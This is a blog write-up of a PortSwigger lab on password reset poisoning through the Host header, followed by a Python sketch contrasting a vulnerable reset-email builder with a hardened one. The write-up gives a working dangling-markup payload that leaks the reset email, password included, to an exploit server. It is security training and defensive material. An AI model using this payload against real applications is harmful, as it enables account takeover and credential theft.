Host Header Manipulations — Password reset poisoning via dangling markup

efran
2 min read · Jul 9, 2023


I tried several methods, but I will focus on explaining the solution and the underlying logic. I won’t cover the discovery part of the vulnerability. Everything happens in the raw content of the email, specifically the HTML components within the received email.

<p>Hello!</p><p>Please <a href='https://0a74005d04afe10a80a90d2f00560028.web-security-academy.net/login'> click here</a> to login with your new password: uXnd8nC8ym</p><p>Thanks,<br/>Support team</p><i> This email has been scanned by the MacCarthy Email Security service</i>

Regarding the lab header, I need to inject the payload after the <a href>, and the injection point is the Host header of the request. First, let’s try to close the <a href> tag.

I received a 504 Gateway Timeout error. This is an expert lab, and I assumed that there may be a vulnerability in the parsers. As I mentioned at the beginning of the article, I attempted several methods. I learned new techniques in the education section of the PortSwigger Academy.

1. I added an arbitrary port such as ":12345", and the request was accepted.
2. I closed the <a href> tag. Success! I am on the right track.

It is clear from the picture above that I have started to see the effects.

3. I added an <img> tag to specify the source host.
4. The completed payload for the Host URL is: :12345'><img src="https://exploit-server?/

There are two important things in the payload. The first is not to close the <img> tag, because leaving it open is what makes the markup dangling. The other is the ?/ part: it is crucial for retrieving the entire email content, because the content that follows is treated as a query string.

Entire Payload
Solution
Result: Logged into Carlos’s account.
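
The root cause behind the steps above, as an added example that is not part of the original post or the lab's code: a reset email built from the raw Host header, next to a version that validates the whole header (including the port) and links only to a configured origin. The hostname shop.example, the function names and the sample password are assumptions made for this sketch.

```python
import html
import re

# Assumed configuration for this sketch (not from the lab): the one origin
# the application is willing to put into outgoing emails.
CANONICAL_HOST = "shop.example"
ALLOWED_HOSTS = {CANONICAL_HOST}

# host[:port] where the port, if present, is 1-5 digits and nothing else.
HOST_RE = re.compile(r"([A-Za-z0-9.-]+)(?::(\d{1,5}))?")

TEMPLATE = ("<p>Hello!</p><p>Please <a href='https://{host}/login'>click here</a> "
            "to login with your new password: {password}</p>"
            "<p>Thanks,<br/>Support team</p>")


def build_email_vulnerable(host_header: str, password: str) -> str:
    """Mirrors the flaw: the raw Host header is pasted into the href."""
    return TEMPLATE.format(host=host_header, password=password)


def validate_host(host_header: str) -> bool:
    """Accept only an allow-listed hostname with an optional numeric port."""
    m = HOST_RE.fullmatch(host_header)
    if not m:
        return False
    name, port = m.group(1).lower(), m.group(2)
    if port is not None and not 0 < int(port) < 65536:
        return False
    return name in ALLOWED_HOSTS


def build_email_hardened(host_header: str, password: str) -> str:
    """Reject bad Host values, link to the configured origin, escape output."""
    if not validate_host(host_header):
        raise ValueError("rejected Host header")
    return TEMPLATE.format(host=html.escape(CANONICAL_HOST, quote=True),
                           password=html.escape(password, quote=True))


# Constructed Host value: allowed hostname plus the port payload from the post.
POISONED = CANONICAL_HOST + ":12345'><img src=\"https://exploit-server?/"

if __name__ == "__main__":
    print(build_email_vulnerable(POISONED, "constructed-pass"))
    print(validate_host(POISONED), validate_host(CANONICAL_HOST + ":12345"))
```

In the vulnerable output the src attribute is never closed, so the password sits inside it; the hardened builder refuses the same header before any email is rendered.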
